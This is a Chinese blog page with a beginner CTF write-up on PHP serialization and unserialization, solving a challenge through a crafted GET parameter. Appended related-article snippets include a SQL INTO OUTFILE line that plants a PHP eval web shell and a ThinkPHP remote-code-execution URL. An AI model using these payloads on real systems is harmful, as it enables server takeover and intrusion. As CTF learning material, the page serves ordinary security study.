unserialize php ctf,ctf serialize 序列化和反序列化

最新推荐文章于 2024-11-25 10:34:23 发布
最新推荐文章于 2024-11-25 10:34:23 发布
阅读量662 收藏
点赞数
文章标签: unserialize php ctf
本文详细介绍了PHP中的序列化与反序列化操作,通过实例展示了如何将数组转换为字符串并恢复。文中提到的关键概念包括`serialize()`和`unserialize()`函数,以及它们在数据存储和传输中的应用。通过在线测评平台加深了对这一过程的理解。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

反序列化

160953a11919

图片.png

和往常一样,先进入网址。

160953a11919

这里我们可以看到上面的源代码。

unserialize($str) === "$KEY"

我们举个例子

$arr=array();

$arr['name']='张三';

$arr['age']='22';

$arr['sex']='男';

$arr['phone']='123456789';

$arr['address']='上海市浦东新区'; var_dump($arr);

//输出:

// array(5) {

// ["name"]=> string(6) "张三"

// ["age"]=> string(2) "22"

// ["sex"]=> string(3) "男"

// ["phone"]=> string(9) "123456789"

// ["address"]=> string(21) "上海市浦东新区" // }

//序列化:

$info=serialize($arr); var_dump($info);

//输出:

//string(140) "a:5:{s:4:"name";s:6:"张三";s:3:"age";s:2:"22";s:3:"sex";s:3:"男";s:5:"phone";s:9:"123456789";s:7:"address";s:21:"上海市浦东新区";}"

////////////////////////说明/////////////////////////////////

//**a:5标志序列化为array包含5个键值对,s:4标志内容为字符串包含4个字符。**//

$zhangsan=unserialize($info);

var_dump($zhangsan);

//输出:

// array(5) {

// ["name"]=> string(6) "张三"

// ["age"]=> string(2) "22"

// ["sex"]=> string(3) "男"

// ["phone"]=> string(9) "123456789"

// ["address"]=> string(21) "上海市浦东新区" // }

这里是反序列化

也即是说把$key反序列化一下我们会得到

s:7:D0g3!!!

我这里有个好玩的东西http://demo.php.cn/可以在线测评php

160953a11919

图片.png

因为是 $_GET的方式

所以我们在地址栏用get的输入格式就行了

http://120.79.33.253:9001/?str=s:7:"D0g3!!!"

这个就是我们需要的地址

黑体字就是我们需要的flag

160953a11919

图片.png

叫我xh
关注
[渗透测试笔记] 14.php反序列化及利用原理
H4ppyD0g的博客
09-30 794
php序列化反序列化 php序列化就是将复杂的数据类型(比如说数组,字典,或者一个对象)转换为字符串,方便传输或者存库等操作,并且之后还能后恢复成原来的数据类型的过程。这样可以在不用这个数据的时候让它占用尽可能少的空间。 要注意的是,序列化只是对他的变量进行序列化,类中的函数是不会参与进来的。 php序列化反序列化的函数 serialize() 用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型结构不会改变。 unseriali
【网络安全 | CTFunserialize3解题详析(php序列化反序列化实例讲解)
等风来
05-21 6619
PHP 中,可以使用 serialize() 函数将对象序列化为字符串,然后保存到文件或传输到其他应用程序中。在 PHP 中,可以使用 unserialize() 函数将序列化后的字符串还原为原始的对象或数据,然后进行处理。对象被序列化并存储为字符串后,如果再次反序列化该字符串并尝试重建相应的对象时,PHP 就会自动调用该对象的。则是将序列化后的数据重新转换为对象、数据结构或变量的过程,以便在程序中进行操作或处理。在反序列化对象时自动调用,用于初始化对象的属性等操作。的对象,该对象有一个属性。
unserialize php ctf,CTF-WEB-XTCTF-Web_php_unserialize
weixin_34677379的博客
03-26 365
题目来源XTCTF-Web_php_unserialize题目考点:PHP代码审计、PHP正则、PHP序列化反序列化解题思路题目源码class Demo {private $file = ‘index.php‘;public function __construct($file) {$this->file = $file;}function __destruct() {echo @high...
CTF笔记 攻防世界Web_php_unserialize
qq_51248658的博客
10-08 536
做过几次反序列化题目,但都是看wp写出来的,也没有记住,所以记一下笔记。小白理解,有不对的地方,还请大佬们指出。通过代码审计进行利用反序列化漏洞(遇到不懂函数要自己去查),然后需要自己进行实例化得到序列化结果,需要多练。
CTF php 序列化,CTF-攻防世界-unserialize3(PHP序列化)
weixin_29228203的博客
03-18 410
题目 hmm....代码硬伤暴击..>_解题过程题目已经说明了这题是php反序列化。代码里面是一个类,类名xctf,类里面就一个string型变量,值为"111"。那么这题就是php的类的序列化。__wakeup方法是php的魔术方法,当调用反序列化函数unserialize()时,会默认检查类中是否存在__wakeup方法,如果存在,会先调用。这个方法的作用一般是用来在反序列化时做一...
ctf+php反序列化,CTF中的PHP反序列化漏洞简单分析
weixin_39965881的博客
04-02 1942
本帖最后由 icq_8bf67fe65 于 2018-9-2 21:20 编辑本文原创作者:Versi0n,本文属i春秋原创奖励计划,未经许可禁止转载!一、前言在ctf比赛中,经常会遇到php反序列化漏洞的题,今天就来简单分析下该漏洞的正确食用姿势~二、正文1.基础知识PHP序列化php为了方便进行数据的传输,允许把复杂的数据结构,压缩到一个字符串中,使用serialize()函数。PHP反序列...
php反序列化1_常见php序列化CTF考题
书山有路勤为径,学海无涯苦作舟
11-25 1859
本质上serialize()unserialize()在php内部的实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象,魔术函数以及序列化相关问题时导致的。当传给unserialize()的参数可控时,那么用户就可以注入精心构造的payload当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。__toString() 是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法以下说明摘自PHP官方手册。
ctfphp序列化,CTF——Web——PHP序列化反序列化
weixin_35126200的博客
04-01 1088
PHP 序列化反序列化:1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程;反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储传输数据,使程序更具维护性。常见的php系列化反系列化方式主要有:serializeunserialize;json_encode,json_decode在进行类的序列化时 私有属性 会加 空白...
PHP反序列化学习笔记(CTF
就是我的博客
08-26 1698
ctfphp反序列化学习
CTF Web_php_unserialize 详细解题过程
m0_63028223的博客
04-16 3419
打开靶场地址,我们看到是一个php代码 我们首先利用kali虚拟机内的dirb,获取敏感信息,扫描网站敏感文件 扫描可以得出该网站下的文件,我将它复制在记事本中 发现一个数据库网站 获取到账号为root密码为空 登录数据库,在SQL出编写一句话木马,并执行。 SELECT "<?php eval(@$_POST['pass']); ?>" INTO OUTFILE '/tmp/test1.php' 接下来我们使用中国蚁剑,链接我们所编写的木马, SELECT "&
ctfphp序列化,0ctf_2016_unserialize(php反序列化逃逸字符)
weixin_39769228的博客
04-01 1172
.0ctf_2016_unserialize(php反序列化逃逸字符)1234知识点:* 代码审计* Unserialize* LFR通过源码,我们可以发现在config.php中的flag,这题意图已经很明显了,是要我们读取config.php文件的内容。1234567...
CTF unserialize3
热门推荐
艺博东的博客
09-25 1万+
题目场景: http://220.249.52.133:52904 (温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、百度搜索:Thinkphp V5.x 远程代码执行漏洞-POC https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%2
XCTF-攻防世界CTF平台-Web类——13、Web_php_unserializephp反序列化漏洞绕过__wakeup()函数、正则表达式)
Onlyone_1314的博客
11-27 1302
打开题目地址: 这也是一个php反序列化的题目 源代码: <?php /** * 定义一个demo类 * / class Demo { # 初始化$file变量的默认值是index.php private $file = 'index.php'; # 类初始化的时候的构造函数,初始化当前对象的页面 public function __construct($file) { $this->file = $file; } # 对象销毁之前的析构函数,高
CTF-web_php_serialize反序列化
Be Smart
02-24 973
.根据题目猜测反序列化漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会反序列化输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其反序列化出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 2.步骤: 通过代码中的注释我们发现flag在fl4g.php这个文件里面,所以我们要将其序列化 编写一段代码先实例化我们要序列化的类,这里吧fl4g.php传进去,
【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析
等风来
05-28 5731
这段代码接收参数 var,使用 base64_decode 函数对 var 进行解码,然后通过 preg_match 函数判断是否包含类似 o:2的字符串,如果存在则中断程序执行,否则调用 @unserialize 函数进行反序列化操作。这段代码首先定义了一个名为 Demo 的类,包含了一个私有变量 $file 三个魔术方法 __construct()、__destruct() __wakeup()。3、private在变量名前添加标记\00(classname)\00,长度+2+类名长度,如。
CTF做题笔记--unserialize3
Hasur的博客
03-03 496
如果我们按照上图的方式,直接将获取的字符串输入进去,发现wakeup()函数成功的调用了,为了让他不被使用,我们可以将里面的属性值1改成其他任意大于他的数字就可以获得flag。序列化指的是:是将变量转换为可保存或传输的字符串的过程,反序列化就是一个相反的过程。通过观察,在这里有一个wakeup()函数,我们就可以得知这是一个反序列化的漏洞。所以在这道题目中,我们需要去确认一下该序列化字符串的属性值。这道题主要是考察大家反序列化的知识,我们先来进入一下题目。在这里我们先介绍一下什么叫序列化
PHP源码中unserialize函数引发的漏洞分析
cnbird's blog
03-07 1634
0×01 unserialize函数的概念 首先看下官方给出的解释:unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值。返回的是转换之后的值,可为 integer、float、string、array 或 object。如果传递的字符串不可解序列化,则返回 FALSE。若被解序列化的变量是一个对象,在成功地重新构造对象之后,PHP 会自动地试图去调用 __wak
php反序列化(ctfshow)
unexpectedthing的博客
11-14 1570
文章目录简介入门反序列化中常见的魔法函数web254web255web256web257为什么需要用urlencode?web258web259介绍web260web261web262web264web263web265web266补充知识点php中输出打印的方式 简介 php序列化反序列用到两个函数 序列化serialize,将对象格式化为一个新的字符串 反序列化unserialize,将字符串还原为原来的对象。 一般在CTF中,可以通过自己写php代码,并传序列化后的代码,可以覆盖原来的代码,从而
php反序列化 ctf
最新发布
03-20
PHP反序列化机制允许开发者通过 `serialize()` `unserialize()` 函数来保存恢复对象的状态。然而,在某些情况下,如果程序未对输入数据进行严格验证,则可能导致安全问题。特别是当恶意用户能够控制传入的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值